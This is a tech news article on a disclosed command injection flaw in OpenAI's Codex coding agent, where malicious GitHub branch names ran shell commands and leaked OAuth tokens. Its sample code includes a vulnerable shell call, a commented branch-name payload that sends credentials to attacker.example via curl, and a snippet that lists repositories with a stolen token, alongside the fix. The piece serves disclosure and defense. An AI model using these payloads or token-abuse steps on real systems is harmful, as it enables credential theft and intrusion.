TechRadar
Sead Fadilpašić

'Not just development tools': Security experts discover critical flaw in OpenAI's Codex which could compromise entire enterprise organizations


  • BeyondTrust Phantom Labs finds critical command injection flaw in OpenAI’s ChatGPT Codex
  • Vulnerability let attackers steal GitHub OAuth tokens via malicious branch names
  • OpenAI patched with stronger input validation, shell escaping, and token controls

Experts have claimed OpenAI’s ChatGPT Codex carried a critical command injection vulnerability that allowed threat actors to steal sensitive GitHub authentication tokens.

This is according to BeyondTrust’s research department, Phantom Labs, whose work helped OpenAI identify and patch the flaw.

ChatGPT Codex is a coding feature within the famed chatbot that helps users write and edit software using plain-language instructions. It can turn human-language requests into working code, and can suggest fixes and improvements the same way.


When a developer makes changes to a GitHub project, they typically work in a separate branch of the repository. According to BeyondTrust Phantom Labs, the problem stems from the way Codex processes branch names during task creation.

Apparently, the tool allowed a malicious actor to manipulate the branch parameter and inject arbitrary shell commands while the environment was being set up.
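BeyondTrust has not published Codex’s internal code, but the bug class is straightforward to illustrate. The Python sketch below is hypothetical: it assumes a setup step that splices an attacker-controlled branch name into a shell string, which is the classic shape of a command injection.

```python
import subprocess

def clone_branch_unsafe(repo_url: str, branch: str) -> None:
    # VULNERABLE (illustrative only, not OpenAI's actual code): the
    # branch name is interpolated into a shell string, so any shell
    # metacharacters it contains are executed as commands.
    subprocess.run(f"git clone --branch {branch} {repo_url}", shell=True)

# Git forbids spaces in branch names, but shell tricks such as ${IFS}
# (which expands to whitespace) sidestep that, so a legal ref name like
# the one below still smuggles in a working exfiltration command:
# "main;curl${IFS}attacker.example/$(cat${IFS}/tmp/creds)"
```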

These commands executed with the container’s privileges, so an attacker could run arbitrary code inside it. Phantom Labs said they were able to pull GitHub OAuth tokens this way, gain access to a theoretical third-party project, and use the tokens to move laterally within GitHub.
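What “lateral movement” means in practice: a GitHub OAuth token is a bearer credential, so whoever holds it gets the same API access as the integration it was issued to. A minimal sketch, assuming the `requests` library and a placeholder token value:

```python
import requests

# Placeholder; a real stolen token would come from the compromised
# container's environment or credential files.
stolen_token = "gho_XXXXXXXXXXXXXXXX"

# List every repository the token can reach -- the starting point for
# moving laterally across an organization's private code.
resp = requests.get(
    "https://api.github.com/user/repos",
    headers={"Authorization": f"Bearer {stolen_token}"},
    params={"per_page": 100},
    timeout=10,
)
resp.raise_for_status()
for repo in resp.json():
    print(repo["full_name"], "(private)" if repo["private"] else "(public)")
```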

Unfortunately, it gets worse. Codex’s command-line interface, SDK, and development environment integrations were all flawed in the same way, and the researchers said that by embedding malicious payloads into GitHub branch names they could compromise numerous developers working on the same project.

After the findings were responsibly disclosed to OpenAI, the company fixed the problem with improved input validation, stronger shell escaping protections, and better controls over token exposure inside containers. OpenAI also reportedly limited token scope and lifetime during task creation.
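OpenAI’s exact patch is not public, but the two defenses named, input validation and avoiding shell interpretation, look roughly the same in any language. A hypothetical sketch; the allow-list pattern and function name are illustrative, not OpenAI’s:

```python
import re
import subprocess

# Conservative allow-list for branch names -- deliberately stricter
# than what Git itself permits, which is the point of defensive
# validation.
SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/-]+")

def clone_branch_safe(repo_url: str, branch: str) -> None:
    if not SAFE_BRANCH.fullmatch(branch):
        raise ValueError(f"rejected suspicious branch name: {branch!r}")
    # An argv list with shell=False (the default) hands the branch name
    # to git as a single argument; no shell ever parses it.
    subprocess.run(
        ["git", "clone", "--branch", branch, repo_url], check=True
    )
```

Passing arguments as a list rather than a string is the standard mitigation for this whole bug class: escaping helps, but not invoking a shell at all removes the parser the attacker was targeting.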

AI coding agents are “live execution environments with access to sensitive credentials and organizational resources,” the researchers concluded.

“Because these agents act autonomously, security teams must understand how to govern AI agent identities to prevent command injection, token theft, and automated exploitation at scale. As AI agents become more deeply integrated into developer workflows, the security of the containers they run in—and the input they consume—must be treated with the same rigor as any other application security boundary.”


